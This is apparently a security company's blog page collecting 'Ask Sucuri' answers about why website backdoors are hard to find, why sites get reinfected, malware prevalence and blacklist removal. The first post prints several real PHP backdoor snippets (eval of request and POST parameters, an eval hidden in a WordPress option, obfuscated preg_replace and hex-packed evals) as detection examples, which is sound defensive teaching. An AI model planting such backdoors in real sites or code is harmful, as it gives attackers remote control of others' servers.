ASK Sucuri: What about the backdoors?


If you have any question about malware, blacklisting, or security in general, send it to us: and we will answer here. For all the “ask sucuri” answers, go here.

Question: What about the backdoors? Why are they so hard to find? How do you guys find them?

When a site gets compromised, one thing we know for sure is that the attackers will leave some piece of malware in there to allow them access back to the site. We call this type of malware, backdoors.

Backdoors are very hard to find because they don’t have to be linked anywhere in the site, they can be very small and be easily confused with “normal” code. Some of them have passwords, some are heavily encrypted/encoded and can be anywhere in your site.

On most online forums, people tell you to search for “eval (base64_decode” and things like that to identify hidden backdoors, but that’s likely not to find everything (and your site will just get reinfected).

For example, on the latest oscommerce compromises, all the sites had the following code added to the application_top.php file:

if (isset($_REQUEST[‘asc’])) eval(stripslashes($_REQUEST[‘asc’]));

Yes, that is a backdoor. It allows the attacker to execute any type of code, add files, remove files, etc. When you are analysing thousands of lines of code, it is easy to miss it.

What about this one:


What you think? Yes, another backdoor, but this time the bulk of it is hidden inside an image (void.jpg). See what we mean, by being hard to detect and search for?

Fun Quiz: Find the backdoor?

Since backdoors can be in any type or shape, let’s look at some examples:

The “Filesman” backdoor, big, complex and easy to find:

$auth_pass = “63a9f0ea7bb98050796b649e85481845”;
$color = “#df5”;
$default_action = “SQL”;
$default_charset = “Windows-1251”;
$protectionoffer = “ficken”;
preg_replace(“/.*/e”,”x65x76x61x6C.. hundreds more lines..

Another simple backdoor, executing any code from the “php” request:

eval (base64_decode($_POST[“php”]));

A WordPress-based backdoor. This time, the bad content is hidden inside the database (wp-options tables)

return @eval(get_option(‘blogopt1’));

A messy backdoor we are seeing in the latest timthumb.php attacks. On this case, all the variables are completely random per case and per file:

>function aknhtkmml3($ur5){$dtuq=’$u’;$pnt=’e6′;$p5zy=’r’;$xcl4=’e(‘;$feuh=’od’;$qjka=’dec’;$rhi=’$u’;
return $ur5;}$sk25=’M3JffC1WcjMrVi1fVHVOKDpoTSIoMGJUNzdXLVZyMytWX1R1Tig6a…

Another messy one. Do you know how the code is executed there? Preg_replace with the “e” modifier actually acts like an “eval”:

$llllllll=’ZnVuY3Rpb24gZnVu3STVFNmxObm1V… LONG LINE of code.. dXBoQmRxemtuRE1SSXJwdjUwd3NWUUhrWmV3dWFKbHUvZzVpc1JKa0M1TWF2RFVMV1cwUG1XKzJF
$lllllllll=pack(‘H*’, ‘406576616c286261736536345f6465636f646528′).’$llllllll))’;
preg_replace($llllll, $lllllllll, $lllllll);

Searching for base64_decode? Well, what happens when the attackers do this:

<?php $XKsyG=’as’;$RqoaUO=’e’;$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t’;$joEDdb

And those are just some simple examples…


So, how to find backdoors?

Finding them is very hard, but inside Sucuri we were able to come up with some techniques that work very well:

  1. White listing. We know how the good files look like. We have a large checksum set of all the core WordPress, Joomla, osCommerce, Wiki, etc, etc files. We also have the checksum for the most popular plugins, modules, extensions and themes. Do you know what that gives us? We know right away if any of the core files were modified (or a new one added) and we can ignore safely the good ones.
  2. Black listing. We also have a list with thousands of backdoors (and their variations) that we have been finding in the last few years.
  3. Anomaly checks. When a file is not in our white list (core files) and not in our blacklist, we do our anomaly checks, where all the functions/variables are analysed and manually inspected to see if they are a backdoor. If it is, we modify our blacklists to catch them in the future, if not, another file to our white list…

So we mix white listing + blacklisting and our own manual analysis to find all the backdoors in a site. If you are trying to clean a compromised site by your self, we recommend first overwriting all the files you can (core files, plugins, etc). Of what is left, you have to analyse manually to make sure it is clean…

What do you think? I would love to hear other ideas to identify backdoors that you guys are using.

Need someone to secure and clean a hacked site? Sign up with us here: http://sucuri,net/signup.

ASK Sucuri: Why does my site keep getting reinfected?

If you have any question about malware, blacklisting, or security in general, send it to us: and we will answer here. For all the “ask sucuri” answers, go here.

Question: Why does my site keep getting hacked / reinfected?

A lot of our new customers only get in contact with us after trying to clean up their sites manually a lot of times without success. A common first question is “I cleaned my site 3 times already and it keeps getting reinfected and blacklisted. What can I do? Can you guys clean it up for good?”

Based on our experience, these are the 4 main causes of reinfections on web sites:

  1. A backdoor is still present in your site. Even though you removed the visible malware, you might still have hidden backdoors in there that the attackers are using to compromise your site. Sometimes even a “clean” backup might still have a backdoor in there. During our clean ups, we always search and remove the hidden backdoors (even when they don’t show up in our scanner).
  2. Stolen FTP/SSH/Admin passwords. This is very common, specially via FTP and compromised desktops. Are you changing your passwords? Is your desktop secure? Even if your desktop is secure, are you using FTP on an insecure wireless (or wired) network? The recommendation is to change all your passwords and scan your desktop for viruses.
  3. Vulnerability in your site. Are you using an outdated CMS? Maybe your WordPress or Joomla or forum is not updated? Make sure to update them asap to avoid reinfections.
  4. Same account infections. If you have other sites in the same FTP account and they are compromised (or infected), the malware can spread back to the site you just fixed. Do you have more sites in the same FTP account? This is specially common on shared servers, but also happens on dedicated servers.

There are also other reasons for reinfections, like when your web hosting company is compromised, causing those “mass infections” we blog about sometimes. But that is outside your power, and there is nothing much you can do about, except switching hosts.

Have a question or a comment? Make sure to ask below :)

Ask Sucuri: What is the most common type of malware out there?

If you have any questions about malware, blacklisting, or security in general, send it to us: and we will answer here. For all the “ask sucuri” answers, go here.

Question: What is the most common type of malware (on web sites) that you find?

Unfortunately the answer to this question changes every few months. For the months of February and March (2011), we scanned more than 200,000 web sites (211,520 to be more precise) and almost half of those sites had some type of malware (A high percentage of users scanning sites via our scanners are already infected or suspect some type of funny business with their web property).

To be exact, 90,870 (around 42%) had some type of malware. This is the breakdown (some may have more than 1 issue identified, so the numbers may not add up):

Read More

Ask Sucuri: How long it takes for a site to be removed from Google’s blacklist?

If you have any questions about malware, blacklisting, or security in general, send it to us: and we will answer here. For all the “ask sucuri” answers, go here

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean, however, it is still blacklisted by Google. How long until they remove us?

This is a very common question. In fact, every time we clear a hacked site, their owner asks us the same question: How long until that scary red warning sign is gone?

To give a solid answer to our clients, for the last few months we started to time how long it takes from when the review submission is requested, until the site is removed by Google. We have now timed more than 500 blacklist removals so I think we have some good numbers to back us up.

heree are the results:
Read More